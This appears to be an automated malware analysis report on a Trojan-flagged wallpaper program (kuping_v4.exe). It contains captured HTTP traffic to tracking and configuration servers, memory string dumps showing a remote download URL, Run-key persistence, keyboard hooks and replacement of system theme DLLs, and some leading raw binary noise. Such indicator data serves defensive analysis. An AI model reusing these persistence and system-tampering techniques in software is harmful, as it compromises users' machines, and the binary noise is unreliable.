T.Q..s.zG..37. Z)E....M<.GFR........%.._w.r...E........H....C.d%.&l
t;.:p......<."...<W.(..o.W..U.re.......w...{N..f...hb.....9.O...
..:Q.......g...3..4....w...{N.6.Z.. v..3..4....w...{N@.`.p..9z.....>
;d)..<.....Y&y...s8p.y..#.."..L.@DD.D.....".eG...w(...I..#.X.#.....
.8..<..4..._O...'v..1.?.gl.%1].DC.'...Qh9G...`..s........1J.Wi.T. .
..k..D..8.r..r......6]T......88._.:/Rmfv...-.D.NV'x[..&h...(6....Hh[..
...h#.sEDJ {.......z./S.Ia..[..H.1&W.....k..l.7........8....a.7.......
.m .!L,....F...........<.=...k.sG1 ....=.9....k=._....FU.E.......N.
.?.2..x....^0..Q...[.T.S..X....&......U .....89.?:..M.5.. .f...Sg ....
m..l1.....nE...@...n!>....n...a...U.)c8\XF~...]R.`=.t..........X.mz
p..6M....K...ys%if.[n. (!.. F;...L......-..`......r..[5c|F...i'..D.*..
M.X.y.J.35.....q..XnZ|.6...cE....t.pn.%........y,1J=.$..........K.N`..
..../....C..Fr....A..=..L.BqO'..........l...K......Y...i.[..jX..s..`..
..&.1.X.}.2/....dQ.<.S....3...3.=.p...pD......Q...u....%.W..
POST /report/ HTTP/1.1
Host: tj.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length:265
data=ZjMVYVZwiAK6CCJeRTMd8GRRFDSozsFpL8eET1YEPNZUpp1dD07N2+hMP3YkgF+Py4XdGkccJqpP6XUfeSGnx6LgpwTcjAFeYsc0Ox/+rd+EYKlhxcfcMyOsKfBrkQYVlPMzUsBlUZ7N7wZcYCq2krolWnI/QhbjfD+X6tPUtaj7d1+VorceohIfyrs3Ph9PIbfbD9HqgjQ=&sgin=07ad79cac644591c6782af1493bbfc45
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:40:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive2..ok..0..
GET /stat.php?id=4793307&web_id=4793307 HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s4.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:24 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 09 Jun 2014 21:41:24 GMT
Expires: Mon, 09 Jun 2014 23:11:24 GMT1f7a..(function(){function l(){this.c="4793307";this.R="z";this.N="";t<<>>
his.K="";this.M="";this.o="1402350084";this.P="hzs6.cnzz.com";this.L="
";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cnzz
_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b){t
ry{var c=[];c.push("siteid=4793307");.c.push("name=" d(a.name));c.push
("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.lo
cation.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex=" d
(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).s
rc="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=docum
ent,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=es
cape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz.c
om/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.ia
(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea(),
this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r]=
f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:functi
on(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argumen
ts)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if("[
object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){va
r c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object String
]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoPag
eview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e){g
(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._cz_
GET /Public/conf/open/1/1_4_3_2_2/10.jpg HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:28 GMT
Content-Type: image/jpeg
Content-Length: 631
Last-Modified: Fri, 09 May 2014 08:26:40 GMT
Connection: keep-alive
ETag: "536c9140-277"
Accept-Ranges: bytes......JFIF.....`.`.....C..............................................
......................C...............................................
............................."........................................
....................}........!1A..Qa."q.2....#B...R..$3br........%&'()
*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................
......................................................................
..........................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.
....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................
.............................................................?..S..(..
...
GET /Public/Configs/KpInstall/AnImg.xml HTTP/1.1
Host: config.wallba.com
Accept:
Referer: hXXp://VVV.wallba.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 206 Partial Content
Server: nginx
Date: Mon, 09 Jun 2014 21:38:08 GMT
Content-Type: text/xml
Content-Length: 581
Last-Modified: Fri, 28 Mar 2014 03:35:50 GMT
Connection: keep-alive
ETag: "5334ee16-245"
Content-Range: bytes 0-580/581<?xml version="1.0" encoding="utf-8"?><think><AnImg>
<img1>hXXp://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue
/0809kt.jpg</img1><img2>hXXp://img.wallba.com/Public/caiji
ansuoluetu/2013nian/8yue/0808fj.jpg</img2><img3>hXXp://img
.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808kt.jpeg</img3&
gt;<img4>hXXp://img.wallba.com/Public/caijiansuoluetu/2013nian/8
yue/0801.jpg</img4><img5>hXXp://img.wallba.com/Public/caij
iansuoluetu/2013nian/8yue/0801.jpg</img5><img6>hXXp://img.
wallba.com/Public/caijiansuoluetu/2013nian/8yue/0801.jpg</img6>&
lt;imginfo>4.3.0.5</imginfo></AnImg></think>..
GET /Public/Configs/KpStartupControl/53390.xml HTTP/1.1
Host: config.wallba.com
Accept:
Referer: hXXp://VVV.wallba.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 09 Jun 2014 21:38:09 GMT
Content-Type: text/html
Content-Length: 1
Connection: keep-alive
ETag: "5088e841-1"...
The Trojan connects to the servers at the folowing location(s):
Map
Strings from Dumps
%original file name%.exe_1196:
`.rsrc
`.rsrc
w.ALT
w.ALT
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
kernel32.dll
kernel32.dll
wininet.dll
wininet.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
taskmgr.exe
taskmgr.exe
%Program Files%
%Program Files%
http://down.21195.com/jm.txt
http://down.21195.com/jm.txt
%Program Files%\
%Program Files%\
http://
http://
surl : '
surl : '
shorturl=
shorturl=
downloadurl
downloadurl
http:\/\/
http:\/\/
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
http=
https
https
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
https://
https://
9(99:;;<==>
9(99:;;<==>
/012345678
/012345678
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s <%s>
%s <%s>
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
c:\%original file name%.exe
c:\%original file name%.exe
WinExec
WinExec
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
<.rd:
<.rd:
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
(*.*)
(*.*)
%original file name%.exe_1196_rwx_00401000_000BB000:
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
kernel32.dll
kernel32.dll
wininet.dll
wininet.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
taskmgr.exe
taskmgr.exe
%Program Files%
%Program Files%
http://down.21195.com/jm.txt
http://down.21195.com/jm.txt
%Program Files%\
%Program Files%\
http://
http://
surl : '
surl : '
shorturl=
shorturl=
downloadurl
downloadurl
http:\/\/
http:\/\/
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
http=
https
https
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
https://
https://
9(99:;;<==>
9(99:;;<==>
/012345678
/012345678
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s <%s>
%s <%s>
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
c:\%original file name%.exe
c:\%original file name%.exe
WinExec
WinExec
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
kuping_v4.exe_600:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
F SShz
F SShz
N SShx
N SShx
tS9.tF
tS9.tF
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GdipSetImageAttributesColorKeys
GdipSetImageAttributesColorKeys
gdiplus.dll
gdiplus.dll
MSVCP60.dll
MSVCP60.dll
IMAGEHLP.dll
IMAGEHLP.dll
WS2_32.dll
WS2_32.dll
?PreTranslateMessage@CSkinCenterDlg@@UAEHPAUtagMSG@@@Z
?PreTranslateMessage@CSkinCenterDlg@@UAEHPAUtagMSG@@@Z
?GetMessageMap@CSkinCenterDlg@@MBEPBUAFX_MSGMAP@@XZ
?GetMessageMap@CSkinCenterDlg@@MBEPBUAFX_MSGMAP@@XZ
SkinCenter.dll
SkinCenter.dll
unrar.dll
unrar.dll
NETAPI32.dll
NETAPI32.dll
PSAPI.DLL
PSAPI.DLL
VERSION.dll
VERSION.dll
MSIMG32.dll
MSIMG32.dll
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
COMCTL32.dll
COMCTL32.dll
kuping_v4.exe
kuping_v4.exe
4.3.1.1
4.3.1.1
version.ini
version.ini
QueryInterface failed! ctrl: %d
QueryInterface failed! ctrl: %d
Can't find the ctrl: %d
Can't find the ctrl: %d
\AboutDlgConfig\MainDlg.ini
\AboutDlgConfig\MainDlg.ini
skinconfig.ini
skinconfig.ini
http://www.wallba.com
http://www.wallba.com
\AppDlgConfig\MainDlgSkin.ini
\AppDlgConfig\MainDlgSkin.ini
Appsoftconfig\button.xml
Appsoftconfig\button.xml
Appsoftconfig\image\soft.xml
Appsoftconfig\image\soft.xml
http://config.wallba.com/Public/Configs/AppSoftconf.xml
http://config.wallba.com/Public/Configs/AppSoftconf.xml
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
WallPlayer.exe
WallPlayer.exe
Appsoftconfig\softtempfile\soft.xml
Appsoftconfig\softtempfile\soft.xml
%System32%
%System32%
wallplay\config\List_imge_theme_config\image.xml
wallplay\config\List_imge_theme_config\image.xml
wallplay\config\WallPlayerConfig\WallPlayImage.xml
wallplay\config\WallPlayerConfig\WallPlayImage.xml
Location: %s
Location: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
HTTP/1.1
HTTP/1.1
http://
http://
kernel32.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
X-X-X-X-X-X
X-X-X-X-X-X
%s\*.*
%s\*.*
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
Microsoft Windows 7
Microsoft Windows 7
ImportExitOrderToUBS
ImportExitOrderToUBS
ImportUserBehaviorToUBS
ImportUserBehaviorToUBS
ImportSoftInformationToUBS
ImportSoftInformationToUBS
UserBehaviorStatistics.dll
UserBehaviorStatistics.dll
temp.jpg
temp.jpg
\DownloadWebImageDlg\MainSkin.ini
\DownloadWebImageDlg\MainSkin.ini
%d%d%d%d%d
%d%d%d%d%d
241870897
241870897
TempDownLoad\FeedBack\qqNum.xml
TempDownLoad\FeedBack\qqNum.xml
\FeedbackDlgConfig\MainFeedbackDlg.ini
\FeedbackDlgConfig\MainFeedbackDlg.ini
set.png
set.png
focus.png
focus.png
http://config.wallba.com/Public/Configs/user_info.xml
http://config.wallba.com/Public/Configs/user_info.xml
.kpscr
.kpscr
.kplgui
.kplgui
.kpicon
.kpicon
.kpcur
.kpcur
.kprar
.kprar
.kptheme
.kptheme
%s %%1
%s %%1
%s\Shell\Open\Command
%s\Shell\Open\Command
%s\Shell
%s\Shell
%s\DefaultIcon
%s\DefaultIcon
%s\kuping_v4.exe,%d
%s\kuping_v4.exe,%d
%s\KpInstallTheme.exe
%s\KpInstallTheme.exe
softset.ini
softset.ini
http://int.dpool.sina.com.cn/iplookup/iplookup.php
http://int.dpool.sina.com.cn/iplookup/iplookup.php
TempDownLoad\UserLive\UserLive.ini
TempDownLoad\UserLive\UserLive.ini
TempDownLoad\TagInfo\TagVersion.ini
TempDownLoad\TagInfo\TagVersion.ini
skinConfig\skinversion.ini
skinConfig\skinversion.ini
TempDownLoad\SearchBuff.ini
TempDownLoad\SearchBuff.ini
Appsoftconfig\APPversion.ini
Appsoftconfig\APPversion.ini
TempDownLoad\Home\Homeversion.ini
TempDownLoad\Home\Homeversion.ini
http://config.wallba.com/Public/Configs/Functon_version.xml
http://config.wallba.com/Public/Configs/Functon_version.xml
TempDownLoad\UserLive\version.ini
TempDownLoad\UserLive\version.ini
userlive.xml
userlive.xml
%s%s.xml
%s%s.xml
http://config.wallba.com/Public/Configs/KpLiveControl/
http://config.wallba.com/Public/Configs/KpLiveControl/
TempDownLoad\Home\tempfile\home.xml
TempDownLoad\Home\tempfile\home.xml
http://config.wallba.com/Public/Configs/KpIndexConf.xml
http://config.wallba.com/Public/Configs/KpIndexConf.xml
Appsoftconfig\tempfile\soft.xml
Appsoftconfig\tempfile\soft.xml
skinConfig\tempfile\SkinSetting.xml
skinConfig\tempfile\SkinSetting.xml
http://config.wallba.com/Public/Configs/SkinSetting.xml
http://config.wallba.com/Public/Configs/SkinSetting.xml
TempDownLoad\TagInfo\list_win7.xml
TempDownLoad\TagInfo\list_win7.xml
http://img.wallba.com/Public/Configs/Album/list_win7.xml
http://img.wallba.com/Public/Configs/Album/list_win7.xml
TempDownLoad\TagInfo\list_xp.xml
TempDownLoad\TagInfo\list_xp.xml
http://img.wallba.com/Public/Configs/Album/list_xp.xml
http://img.wallba.com/Public/Configs/Album/list_xp.xml
TempDownLoad\Home\home.xml
TempDownLoad\Home\home.xml
%s\system32\themeui.dll
%s\system32\themeui.dll
%s\system32\uxtheme.dll
%s\system32\uxtheme.dll
crackthemepackwinxp.rar
crackthemepackwinxp.rar
%s\system32
%s\system32
.backup
.backup
%s\system32\dllcache\themeui.dll
%s\system32\dllcache\themeui.dll
%s\system32\dllcache\uxtheme.dll
%s\system32\dllcache\uxtheme.dll
%s\system32\themeservice.dll
%s\system32\themeservice.dll
crackthemepackwin7.rar
crackthemepackwin7.rar
%s /grant administrators:F
%s /grant administrators:F
/f %s
/f %s
crackthemepackwin7x64.rar
crackthemepackwin7x64.rar
Kernel32.dll
Kernel32.dll
urlEx
urlEx
weburl
weburl
\WebContro.ini
\WebContro.ini
login
login
IsShowWindow
IsShowWindow
IndividualCenter.dll
IndividualCenter.dll
loginInfo\head.jpg
loginInfo\head.jpg
http://kuping.wallba.com/web/help.html#win7sj
http://kuping.wallba.com/web/help.html#win7sj
\KPUpdater.dll
\KPUpdater.dll
set_1.png
set_1.png
SepLine.png
SepLine.png
tui-chu.png
tui-chu.png
menu_move.png
menu_move.png
about.png
about.png
feedback_icon.png
feedback_icon.png
help_icon.png
help_icon.png
show.png
show.png
\MenuSetConfig.ini
\MenuSetConfig.ini
update.png
update.png
set_icon.png
set_icon.png
KpInstallTheme.exe
KpInstallTheme.exe
http://www.wallba.com/Help.shtml
http://www.wallba.com/Help.shtml
IsLogin
IsLogin
getnew.exe
getnew.exe
http://tj.153624.com/behavior/
http://tj.153624.com/behavior/
http://tj.153624.com/report/
http://tj.153624.com/report/
TongJICNZZ.dll
TongJICNZZ.dll
update/soft.ini
update/soft.ini
updateupgrade.exe_0
updateupgrade.exe_0
updateupgrade.exe
updateupgrade.exe
SystemConfig\setting.ini
SystemConfig\setting.ini
http://config.wallba.com/Public/Configs/Liveindex.html?id=
http://config.wallba.com/Public/Configs/Liveindex.html?id=
http://img.wallba.com/Public/Configs/index.html?id=
http://img.wallba.com/Public/Configs/index.html?id=
Kpclick.ini
Kpclick.ini
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
\UpdateUi\UpdateSkin.ini
\UpdateUi\UpdateSkin.ini
\MainSkin.ini
\MainSkin.ini
GetLoginHashValue
GetLoginHashValue
GetLoginUid
GetLoginUid
InitLogin
InitLogin
login.dll
login.dll
LocBootScreen.xml
LocBootScreen.xml
LocIconsfolder.xml
LocIconsfolder.xml
LocScreensaver.xml
LocScreensaver.xml
LocMouseponit.xml
LocMouseponit.xml
LocThemeXml.xml
LocThemeXml.xml
LocWallpaleXml.xml
LocWallpaleXml.xml
StowBootScreen.xml
StowBootScreen.xml
StowIconsfolder.xml
StowIconsfolder.xml
StowScreensaver.xml
StowScreensaver.xml
StowMouseponit.xml
StowMouseponit.xml
stowThemeXml.xml
stowThemeXml.xml
StowWallpaleXml.xml
StowWallpaleXml.xml
wallpaper.bmp
wallpaper.bmp
EXPLORER.EXE
EXPLORER.EXE
UniversalMini.exe
UniversalMini.exe
%skuping_v4.exe start
%skuping_v4.exe start
kuping_v4.exe start
kuping_v4.exe start
\softset.ini
\softset.ini
%sKp_BootClr.exe
%sKp_BootClr.exe
contact=%s:%s&content=%s
contact=%s:%s&content=%s
/index.php?s=/Index/comment_save/
/index.php?s=/Index/comment_save/
kuping.wallba.com
kuping.wallba.com
loginInfo\head_new.jpg
loginInfo\head_new.jpg
head.jpg
head.jpg
loginInfo\
loginInfo\
nick
nick
msg_num
msg_num
/kp_api.php?s=User/getuser&uid=
/kp_api.php?s=User/getuser&uid=
member.wallba.com
member.wallba.com
StartUp.xml
StartUp.xml
